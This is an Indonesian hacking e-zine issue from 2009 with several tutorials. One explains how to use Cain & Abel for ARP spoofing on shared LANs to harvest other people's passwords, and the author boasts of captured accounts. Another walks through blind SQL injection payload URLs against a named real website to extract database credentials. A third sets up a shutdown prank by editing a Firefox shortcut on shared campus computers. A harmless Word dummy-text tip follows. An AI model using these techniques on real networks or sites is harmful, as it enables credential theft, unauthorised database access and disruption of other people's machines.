1. Software Cain&Abel (bisa di cari digoogle udah bertebaran atau langsung ke home nya di
www.oxid.it
2. Komputer yang terhubung dengan LAN (Bisa di Lab Internet, Warnet, Kantor, maupun Hotspot
area)
3. Kopi panas/The anget (yang penting minuman yang kalian suka biar ga haus)4. Camilan(yang bisa dimakan nemani saat sniffing)
5. Teman yang asik (bisa cewek atau yang lain)
Oke sudah lengkap khan????
Kita mulai, saya anggap kalian sudah mendapatkan Cain&Abel sekarang yang mesti kalian lakukan
membuka file tersebut. EIts tunggu dulu matikan antivirus yang berjalan agar Cain&Abel tidak
dimakan oleh antivirus yang bangsat tersebut. Karena kita disini ga mengenal antivirus.
Kwkwkkwkwkw
Klik dua kali untuk memulai instalasi
Ikuti petunjuk yang ada. Kalo nggak ngerti bahasa inggris kayak aku ya klik aja yang ada tulisannya NEXT
ampe ketemu tulisan FINISH berarti kita udah sukses.
Ini kita diminta install Wincap yang emang sudah disertakan satu paket dengan Cain & Abel itu sendiri.
Apabila kita tidak install maka Cain & Abel tidak akan berjalan. Namun apabila anda sudah menginstall
tools yang lain dan menyertakan Wincap maka anda tidak usah mengisntall Wincap kembali. Untuk
Instalasi tetap masih seperti yang pertama klik next sampai ketemu finish.
mailto:[email protected]:[email protected]:[email protected]://www.oxid.it/http://www.oxid.it/http://www.oxid.it/mailto:[email protected] -
8/14/2019 Hacking Billing Explorer Hal 9 Remote
55/71
- 54- HC eMagazine Spirit # 02
Hackers-Center 2009 HC eMagazine Vol. 02
Oke sekarang selesai lah semua. Kita sudah bisa menggunakan Cain & Abel kita. Cara memanggil
program ini sama dengan program aplikasi yang lain. Kalian tinggal cari shortcut Cain & Abel ini. Klik
Start>> all Program >> Cain >> Cain
Ini adalah tampilan awal kita masuk ke dalam Cain & Abel. Langkah selanjutnya adalah kita perlu untuk
mengkonfigurasi Cain & Abel dengan Hardware kita. Bisa LanCard ataupun wireless.
-
8/14/2019 Hacking Billing Explorer Hal 9 Remote
56/71
- 55- HC eMagazine Spirit # 02
Hackers-Center 2009 HC eMagazine Vol. 02
Klik Configure maka akan muncul jendela baru seperti diatas. Pilih IP address yang koneksi dengan
computer lain. Kemudian klik Apply dan OK
.
Selanjutnya kita Aktif kan Cain & Abel dengan klik tombol
Selanjutnya klik Tombol + yang ada di toolbarmaka akan muncul jendela baru MAC Address Scanner. Ini berfungsi mencari MAC Address atau
alamat computer yang terkoneksi dengan jaringan kita. Klik OK
-
8/14/2019 Hacking Billing Explorer Hal 9 Remote
57/71
- 56- HC eMagazine Spirit # 02
Hackers-Center 2009 HC eMagazine Vol. 02
Maka akan muncul MAC Address komputer lain. Kalo lebih dari satu itu pertanda baik bagi kita. Karena
sniffing lebih seru kalo komputer lebih dari satu. Selanjutnya klik tombol APR yang ada di bagian bawah
akan muncul jendela baru. Setelah masuk ke
jendela APR langkah selanjutnya klik di colom Status kemudian klik tombol + akan muncul jendelabaru
-
8/14/2019 Hacking Billing Explorer Hal 9 Remote
58/71
- 57- HC eMagazine Spirit # 02
Hackers-Center 2009 HC eMagazine Vol. 02
Klik no IP server yang di sebelah kiri (biasanya 192.168.0.1atau yang akhir nya angka 1 itu pasti
server) akan muncul IP di table sebelah kanan blok semua IP tersebut dan klik OK. Aktifkan APR
dengan klik tanda bulat warna kuning di bagian atas toolbar. Maka akan muncul status baru di
table bawah, jika berwarna hijau maka ada yang koneksi dengan internet. Kalngak selanjutnya
adalah kita masuk ke jendela password dengan klik tab Password yang ada di bagian bawah.
Akan muncul banyak tulisan di situ. Kalian tinggal nunggu aja dan sesekali mengecek. Setiap ada yang
membuka web dan membutuhkan LOGIN maka akan muncul username dan Passwordnya. Ini
merupakan cara termudah kita mendapatkan Username dan Password di LAN. Yang telah berhasil saya
temukan yakni password untuk Friedster, Yahoo mail & Messenger, Blogspot dan account account
lainnya. So selamat memanen password di tempat LAN favorite kalian
-
8/14/2019 Hacking Billing Explorer Hal 9 Remote
59/71
- 58- HC eMagazine Spirit # 02
Hackers-Center 2009 HC eMagazine Vol. 02
Selain mencari password dan username untuk masuk website, kita juga bisa menemukan password
admin server LAN yang kita gunakan. Dan banyak lagi fungsi dari Cain & Abel ini kalian tinggal mencari
tutorial yang lebih lengkap di GOOGLE dengan tag cain&abel. Sekian dari saya. phychole
Attention:
Tujuan dari saya menulis artikel ini adalah untuk sharing ilmu yang telah saya miliki. Phychole tidak
bertanggung jawab atas penyalah gunaan atas yang anda lakukan. Segala resiko yang akan anda
temukan silahkan anda selesaikan sendiri. Apabila ada pertanyaan saran dan kritik silahkan hubungi
saya.
Create on Wednesday, March 18, 2009 on my place by phychole
Email :[email protected], YM : phychole , phy_chole FS:www.friendster.com/phychole
Special thaks :
- Allah SWT
- My Family
- Oxid.it
- Yogyafree Community
- Google
My friends
- Stressdesign
- Blue_right
- Ari_87yanto
- ^nd3s0^
- Ghozt
..Thanks to all reader .
mailto:[email protected]:[email protected]:[email protected]://www.friendster.com/phycholehttp://www.friendster.com/phycholehttp://www.friendster.com/phycholehttp://www.friendster.com/phycholemailto:[email protected] -
8/14/2019 Hacking Billing Explorer Hal 9 Remote
60/71
- 59- HC eMagazine Spirit # 02
Hackers-Center 2009 HC eMagazine Vol. 02
Blind InjectionExploit Web with Blind SQL Injection
Writer : omicron9194([email protected])
Blind Injection? Yupz itu salah satu teknik serangan hacker. Omicron akan
menjelaskan sesimple mungkin ttg blind injection ini, yg dulunya omicron
anggap rumit banget. Stop! bukan bermaksud utk ngajarin temen2,tapi
omicron berusaha memberikan apa yg omicron punya meskipun masih
sedikit.
Bermula dari coba-coba mencari teknik baru (padahal ini kan teknik teknik
lama? Wkwk :p) jadi omicron mencoba dgn teknik ini (just for learn), ga
ada maksud utk deface ato apalah.
OK,ini alamatnya :
http://cmc.msc.com.my/event_detail.php?ID=190
langsung test vulnerable nya
http://cmc.msc.com.my/event_detail.php?ID=190 and 1=1 >> urutan dari value tsb
# CHAR >>> peubah dalam desimal
# 65 >>> value desimal tsb dan 65 adalah "A" dalam ASCII jadi omicron mengawalinya dengan "A" >> 65 dalam
ASCII , bisa di awali dari apa aja,tapi utk lebih valid,omicron mengawali dgn huruf "A" >>> 65
Setelah kita masukkan URL tadi,,apa yg akan di tampilkan ? Yupz,nilainya ada 2,True or False.
True >>> jika halamannya menampilkan dalam keadaan normal (berita,gambar,etc .. tidak hilang)
False >>> jika halamannya tidak menampilkan sebagian ato seluruh isi dari halaman tsb (berita,gambar,etc ..
ada yg hilang)
http://cmc.msc.com.my/event_detail.php?ID=190 and mid(user(),1,1)=char(65)
-
8/14/2019 Hacking Billing Explorer Hal 9 Remote
61/71
- 60- HC eMagazine Spirit # 02
Hackers-Center 2009 HC eMagazine Vol. 02
http://cmc.msc.com.my/event_detail.php?ID=190 and mid(user(),1,1)=char(66) R dalam ASCII
Lanjut sampe halaman tsb bernilai false dan akan mendapatkan :
http://cmc.msc.com.my/event_detail.php?ID=190%20and%20mid(user(),1,10)=char(67,82,69,83,84,81,95,67,7
7,68)
67 = C
82 = R
69 = E
83 = S
84 = T
81 = Q
95 = _
67 = C
77 = M
68 = D
Nah itu usernamenya >>> CRESTQ_CMD
klo mw cari password nya >>> value user() ganti jadi >>> database() , dan dilakukan sama dengan cara di atas :
http://cmc.msc.com.my/event_detail.php?ID=190%20and%20mid(database(),1,12)=char(67,82,69,83,84,81,95
,67,77,68,68,66)
67 = C
82 = R
69 = E
83 = S84 = T
81 = Q
95 = _
67 = C
77 = M
68 = D
68 = D
66 = B
-
8/14/2019 Hacking Billing Explorer Hal 9 Remote
62/71
- 61- HC eMagazine Spirit # 02
Hackers-Center 2009 HC eMagazine Vol. 02
Password yg di dapat >>> CRESTQ_CMDDB
Jadi user dan passwordnya >>> CRESTQ_CMD dan CRESTQ_CMDDB
sep dah.selesain kan.xixixii...ternyata ga terlalu rumit yg omicron bayangkan,tapi,,,harus ada waktu panjang utk
blind injection ini,sabar aja ok.
Inget! Yang omicron exploit itu belum tentu user dan pass adminnya.Tergantung dari web yg kita exploit.
Thx buat Cyber*Z_Camel yg udah ngasih target dan berusaha menjawab pertanyaan2 cupu omicron.
Semoga penjelasan omicron bermanfaat :)
Oia, untuk menngenal kode ASCII ,, siapa tau ga berguna...xixixixi.....
http://ciebal.web.id/char.txt
http://ciebal.web.id/char.txthttp://ciebal.web.id/char.txthttp://ciebal.web.id/char.txt -
8/14/2019 Hacking Billing Explorer Hal 9 Remote
63/71
- 62- HC eMagazine Spirit # 02
Hackers-Center 2009 HC eMagazine Vol. 02
Hack Shortcut MozillaMenjahili Orang dengan Shortcut Mozilla
Writer : Chazali Husni([email protected])
Wah. Senang sekali ni karena pada akhirnya zali bisa ikut menulis tentang hacking, y,...
meskipun ini merupakan tekhnik lama. Tapi bagi yang sudah tau teknik ini, tlong
diacuhkan saja dan bagi teman2 yang belum tau silahkan mencoba.
Biasanya zali melakukan ini di fasilitas internet kampus, kalau mereka tidak mau masuk
kuliah gara2 internet ( zali tidak bertanggung jawab atas penyalah gunaan tekhnik ini..)
Oke, kita langsung ke RED ZONE (maksudnya, kita praktekan,..hehehehe.)
Pertama, kita cari targetnya yaitu Shortcut Mozilla Firefox bs juga yang lain ( zali, ngehack firefox karena agar
teman2 zali berhenti main internet)
Kedua, klik kananpada Shortcutkayak gini ni
Ketiga, pada target yang saya lingkari dengan garis merah pada gambar diatas....Kita ganti dengan
Shutdownsc Ga boleh lagi maen disini... t 50
mailto:[email protected]:[email protected]:[email protected]:[email protected] -
8/14/2019 Hacking Billing Explorer Hal 9 Remote
64/71
- 63- HC eMagazine Spirit # 02
Hackers-Center 2009 HC eMagazine Vol. 02
Nah, pasti teman2 pada bertanya2 maksud dari script tersebut apa, tetapi bagi yang sudah tau pasti dong tau..
Oke zali akan jelasin sedikit...
-----------------------------------------------------------------------------------------------------------
Shutdown -s : sebagai perintah untuk mematikan sistem komputer-c : sebagai pesan, terserah kita mau buat apa. Tapi jangan lupa diapit oleh tanda kutip
---------------------------------------------------------------------------------------------------------
Eits,,,,jangan lupa klik Ok setelah itu..
Nah...nantinya jadinya akan seperti ini...
TEDENG>>>>>
Nah...sekian dulu tulisan dari zali...
Sekedar informasi, pesan yang nantinya tidak akan bisa kita matikan dengan mengklik x ataupun
menggunakan Task Manager...
A: Jadi Bagaimana matikannya?
Z: Hehehe... masalah itu kita bahas di tulisan berikutnya..
-
8/14/2019 Hacking Billing Explorer Hal 9 Remote
65/71
- 64- HC eMagazine Spirit # 02
Hackers-Center 2009 HC eMagazine Vol. 02
Terima kasih kepada Allah SWT yang telah memberikan kesehatan dan PC buat zali, kepada kedua orang tua
dan pacar q yang mendukungku... dan Mohon maaf atas kekurangan dari tulisan ini
Biodata
Nama : Chazali Husni
Blog : chazalihusni.blogspot.com
NB:
Penulis tidak bertanggung jawab atas penyalah gunaan tekhnik ini, Hacking is not crime
mailto:[email protected]:[email protected]:[email protected]:[email protected]:[email protected]:[email protected]:[email protected]:[email protected] -
8/14/2019 Hacking Billing Explorer Hal 9 Remote
66/71
- 65- HC eMagazine Spirit # 02
Hackers-Center 2009 HC eMagazine Vol. 02
Dummy Text MS Word 2007Karakter Rahasia pada Microsoft Word 2007
Writer : ciebal([email protected])
Para programmer dalam membuat program tentu harus membuat programnya dengan
unik untuk membuktikan bahwa program yang dibuat adalah hasil karyanya. Pada
Microsoft Office 2007 ternyata para programmernya membuat hal unik yang tidak banyak
orang tau dan saya sendiri mengetahuinya dari salah satu trainer sertifikasi CEH, Microsoft,
Oracle, dll di bandung. Waktu itu saya tanya tentang karakter rahasia di notepad tapi dia
menujukan beberapa keunikan dari Microsoft Word 2007 (saya belum coba di MS Word
2003) dan kali ini saya coba shre 3 karakter tersebut yang sering disebut dengan Dummy Text karena memang
tidak ada manfaat dan artinya. Xixixixixi
Oke deh langsung aja ada 3 dummy text yang ciebal tau yaitu :
1. Ketikan teks di bawah ini pada halaman microsoft word 2007 kamu.
=lorem()
Tekan Enter dan contoh hasilnya sebagai berikut ini:
Artinya apa yah..? saya juga gak tau, namanya juga dummy text.. :P
2. Sama dengan cara pertama, hanya yang kita ketikan adalah teks berikut ini.
=rand()
Tekan Enter dan hasilnya sebagai berikut:
mailto:[email protected]:[email protected]:[email protected]:[email protected] -
8/14/2019 Hacking Billing Explorer Hal 9 Remote
67/71
- 66- HC eMagazine Spirit # 02
Hackers-Center 2009 HC eMagazine Vol. 02
Nah klo yang ini sedikit dimengerti karena bahasa inggris, kamu tinggal buka transtool aja... xixixixi
3. Sama seperti sebelumnya, sekarang kamu ketik text berikut ini :
=rand.old()
Tekan Enter dan hasilnya sebagi berikut:
Dummy teks yang ini biasanya digunakan sebagai contoh kalimat pada saat pemilihan Font di sistem operasi
Windows.
Lalu apa manfaatnya..? yah gak ada manfaatnya, tapi setidaknya kamu sekarang mengetahui sedikit rahasia MS
Word 2007. Kamu bisa mengubah dummy text tersebut dengan sedikit variasi. Sebagai contoh, jika kita
mengetikkan =rand(3,5) maka Word akan menyisipkan teks sebanyak 3 paragraf dimana masing-masing
paragraf terdiri dari 5 baris kalimat.
Kok gak bisa sih di Word 2007 saya..?
Secara default fasilitas ini sudah aktif. Jika ternyata setelah kita ketikan cara-cara diatas ternyata tidak terjadi
apapun, kemungkinan adalah fitur Replace text as you type berada dalam kondisi non-aktif. Untuk
mengaktifkannya, caranya sebagai berikut:
Klik Office Button yang ada di sudut kiri atas bidang aplikasi Word.
Pilih Word Options >> Proofing >> AutoCorrect Options.
-
8/14/2019 Hacking Billing Explorer Hal 9 Remote
68/71
- 67- HC eMagazine Spirit # 02
Hackers-Center 2009 HC eMagazine Vol. 02
Pilih tab AutoCorrect. Lalu aktifkan replace text as you type.
Ok lah, sekian dulu artikel saya yang gak jelas ini, dan semoga jadi bertambah ilmu kita walaupun hanya sedikit.
Untuk mengetahui lebih jelas tentang dummy text ini bisa dibaca di situs resmi Microsoft nya.
http://support.microsoft.com/kb/212251
/Nick at Forum : ciebal
/Location : Banten - Bandung
/Email :[email protected]@mugi.or.id
/Web:www.ciebal.web.id|www.indoblogger.web.id
/Thanks to:
Allah SWT, My Family, All My Friends, HC Staff, Indoblogger Community, omicron9194, eminem,
Paluared JS, Blackpaper, Quatum.Byte, chuwey, kemangi, aris lesmana, xyberbreaker, All Reader, etc..
Tengkyu semuanya yang gak bisa disebutin satu-persatu.
http://support.microsoft.com/kb/212251http://support.microsoft.com/kb/212251mailto:[email protected]:[email protected]:[email protected]:[email protected]:[email protected]:[email protected]://www.ciebal.web.id/http://www.ciebal.web.id/http://www.ciebal.web.id/http://www.indoblogger.web.id/http://www.indoblogger.web.id/http://www.indoblogger.web.id/http://www.indoblogger.web.id/http://www.ciebal.web.id/mailto:[email protected]:[email protected]://support.microsoft.com/kb/212251 -
8/14/2019 Hacking Billing Explorer Hal 9 Remote
69/71
- 68- HC eMagazine Spirit # 02
Hackers-Center 2009 HC eMagazine Vol. 02
HC eMagazine WriterKetentuan Menjadi Penulis HC eMagazine
Berminat menjadi penulis di HC eMagazine edisi berikutnya? Apabila anda berminat
jangan ragu-ragu untuk mengirimkan artikel anda ke redaksi HC eMagazine. Artikelharus asli tulisan anda, kalaupun itu bukan buatan anda harus mencantumkan sumber
asli anda mendapatkan artikel tersebut. silahkan kirim artikel anda dengan ketentuan
sebagai berikut :
Materi yang ditentukan :
Kategori Komputer & Internet
Kategori Pemograman / Coding
Kategori Hacking & Cracking
Kategori Phising & Phreaking
Kategori HandphoneKirimkan tulisan anda dengan format :
Format File : .doc atau .docx
Page Setup : Paper size = Letter atau A4
Line spacing : single
Font : Arial atau Calibri, size 12
Kirimkan tulisan ke Redaksi HC eMagazine :
Subject : HC eMagazine
Attachment :JudulTutorAnda.zip atau JudulTutorAnda.rar (pilih salah satu saja).
Tidak menerima file download di ziddu, rapidshare, 4shared, dll. (jika ukurannya besar di perbolehkan
disimpan di hosting seperti ripway, fileAve, Geocities, dll)
Artikel akan diseleksi. Jika sesuai dengan kriteria, maka akan kami publish di HC eMagazine edisi
berikutnya. Redaksi HC berhak mengedit isi tulisan sesuai kebutuhan.
Terima kasih.
Redaksi HC eMagazine
-
8/14/2019 Hacking Billing Explorer Hal 9 Remote
70/71
- 69- HC eMagazine Spirit # 02
Hackers-Center 2009 HC eMagazine Vol. 02
Lampiran :Serba Serbi HC eMagazine
Kopdar Staff HC & Redaksi HC eMagazine di Bandung (Dago Plaza)..
Silahkan Tebak Siapa Aja tuh Disitu.. :P
-
8/14/2019 Hacking Billing Explorer Hal 9 Remote
71/71
- 70- HC eMagazine Spirit # 02
Donasi Logo
Donasi Dari Cybernet